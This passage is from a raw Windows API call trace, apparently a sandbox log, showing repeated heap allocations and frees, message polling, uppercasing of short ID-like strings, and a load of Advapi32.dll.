lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0190.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ab0 [0190.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0190.019] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0190.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0190.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0190.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0190.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0190.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0190.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0190.019] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0190.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0190.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0190.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0190.020] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0190.020] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0190.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0190.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0190.020] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0190.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c78 [0190.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.020] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0190.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0190.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0190.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0190.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0190.021] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0190.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0190.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0190.021] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0190.021] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0190.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0190.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0190.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0190.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0190.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0190.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0190.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0190.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0190.022] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0190.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0190.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0190.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0190.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0190.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0190.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0190.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0190.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0190.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0190.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0190.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.023] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0190.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0190.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0190.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0190.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.024] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0190.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.024] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0190.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0190.025] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0190.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0190.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2658 [0190.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0190.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0190.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aaec0 [0190.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0190.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0190.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0190.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0190.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0190.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0190.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.025] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0190.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0190.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0190.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0190.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0190.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0190.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0190.026] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0190.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0190.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0190.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0190.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0190.026] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0190.026] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0190.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0190.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0190.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0190.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0190.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0190.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.027] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0190.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0190.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0190.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0190.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.028] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0190.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0190.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0190.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0190.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0190.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0190.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0190.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0190.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.028] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0190.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0190.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0190.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0190.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0190.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0190.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0190.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0190.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0190.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0190.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0190.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0190.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0190.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0190.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0190.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.029] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0190.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0190.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.030] 